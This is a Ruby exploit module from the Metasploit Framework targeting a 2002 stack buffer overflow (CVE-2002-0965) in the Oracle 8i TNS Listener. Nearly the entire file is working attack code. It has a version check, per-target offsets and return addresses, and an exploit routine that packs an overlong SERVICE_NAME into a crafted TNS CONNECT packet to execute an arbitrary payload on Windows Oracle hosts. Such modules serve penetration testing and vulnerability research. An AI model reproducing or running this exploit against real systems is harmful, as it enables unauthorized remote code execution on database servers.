##
# $Id: tns_service_name.rb 11128 2010-11-24 19:43:49Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::TNS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Oracle. When
				sending a specially crafted packet containing a long SERVICE_NAME
				to the TNS service, an attacker may be able to execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11128 $',
			'References'     =>
				[
					[ 'CVE', '2002-0965'],
					[ 'OSVDB', '5041'],
					[ 'BID', '4845'],
					[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/02-0013.shtml' ],
					[ 'URL', 'http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\% ()",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2000)',   { 'Offset' => 6396, 'Ret' => 0x60a1e154 } ],
					[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2003)',   { 'Offset' => 6392, 'Ret' => 0x60a1e154 }] ,
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'May 27 2002'))

		register_options([Opt::RPORT(1521)], self.class)
	end

	def check
		connect

		version = "(CONNECT_DATA=(COMMAND=VERSION))"
		pkt = tns_packet(version)
		sock.put(pkt)

		sock.get_once
		res = sock.get_once(-1, 1)

		disconnect

		if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ )
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		buff =  rand_text_alpha_upper(target['Offset'] - payload.encoded.length) + payload.encoded
		buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
		buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(400)

		sploit = "(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=#{rhost}(PORT=#{rport}))(CONNECT_DATA=(SERVICE_NAME=#{buff})(CID=(PROGRAM=MSF))))"

		pkt = tns_packet(sploit)

		print_status("Trying target #{target.name}...")
		sock.put(pkt)

		handler

		disconnect
	end

end